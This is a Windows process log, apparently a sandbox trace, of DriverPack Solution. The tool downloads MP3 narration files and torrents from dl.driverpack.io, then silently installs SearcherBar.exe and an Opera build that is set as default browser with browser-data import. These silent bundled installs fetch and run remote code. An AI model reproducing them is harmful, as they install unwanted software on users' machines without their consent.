"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_83042.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51382.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_56550.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_72316.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_52259.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/tools/DriverPack-Alice.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_108.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/tools/DriverPack-Alice.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\SearcherBar.exe" /S || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_3703.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "9179840651211197460-786827858610033766915910457-9928675401299386635-2039885242"

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\SearcherBar.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\SearcherBar.exe" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-18.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_85545.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_85545.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-17.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_15851.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_15851.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-16.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_40511.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_40511.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-15.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_73637.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_73637.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-14.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_81699.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_81699.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1696039868281860052-1434661370-1102157008-6979421399378507561332252760663479691"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-16.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_40511.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-18.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_85545.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-17.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_15851.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-14.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_81699.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-15.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_73637.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-13.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_37101.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_37101.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-12.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_30966.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_30966.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-11.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_55141.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_55141.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_98365.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_98365.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-179284028428404970152590302813692144201777433258-2048970250-1021918282-1566513848"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_84659.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_84659.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-11.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_55141.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-12.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_30966.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-13.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_37101.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_98365.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_84659.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/DirectX.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_22202.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/DirectX.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe" -install -silent -launchopera=1 -setdefaultbrowser=1 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_59759.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "13993079111501701828-18984151341816485123936715867339810589-2081945336-1859418603"

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe" -install -silent -launchopera=1 -setdefaultbrowser=1

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe" -install -silent -launchopera=1 -setdefaultbrowser=1 --crash-reporter-parent-id=2944

C:\Users\Admin\AppData\Local\Temp\Opera Installer\OperaXP.exe

"C:\Users\Admin\AppData\Local\Temp\Opera Installer\OperaXP.exe" --version

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe" --backend --silent --install --import-browser-data=1 --enable-stats=1 --enable-installer-stats=1 --launchopera=1 --installfolder="C:\Program Files (x86)\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=1 --setdefaultbrowser=1 --startmenushortcut=1 --desktopshortcut=1 --quicklaunchshortcut=0 --pintotaskbar=1 --server-tracking-data=server_tracking_data --initial-pid=2944 --crash-reporter-pid=2156 --wait-for-package="C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131" --initial-proc-handle=90010000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_63248.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_63248.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_50519.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_50519.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-161042756218886792751310296763-1674608012-1263487272-1612014810-4972650301708371158"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_57362.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_57362.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1031990678-33838346-74725816616905463851351258364-132276809-4364703951461918483"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-7.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_50519.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-8.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_63248.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-technologies-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_57362.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_67186.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_67186.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_32817.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_32817.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1591076120334153925-9098197291873269589-280704731903217011141762451-949502206"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_92323.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_92323.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_33201.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_33201.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_11534.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_11534.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-72034605317886767626574580801311666235204150862416030156079460254242113755762"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_32817.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_33201.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_92323.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_11534.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_67186.log"

C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe

"C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe" --backend --silent --initial-pid=2944 --install --import-browser-data=1 --enable-stats=1 --enable-installer-stats=1 --launchopera=1 --installfolder="C:\Program Files (x86)\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=1 --setdefaultbrowser=1 --startmenushortcut=1 --desktopshortcut=1 --quicklaunchshortcut=0 --pintotaskbar=1 --server-tracking-data=server_tracking_data --crash-reporter-pid=2156

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-15.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_16043.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_16043.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-14.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_14032.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_14032.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-11.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_11462.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_11462.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_86232.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_86232.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-191070327455871284214827289991403154764-806135370-1562695991-2103961550118036102"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-504171112-1224278183291446943-588644692176676597-7101494081449091565-5288141"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-130039124314137873178425636391027571578156849687140800394111695536111071177138"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-9.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_27460.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_27460.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-10.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_86232.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-14.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_14032.log"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "389084694443116751-612356604-712876806-117605503712403180995205970341703616630"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-why-free-11.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_11462.log"

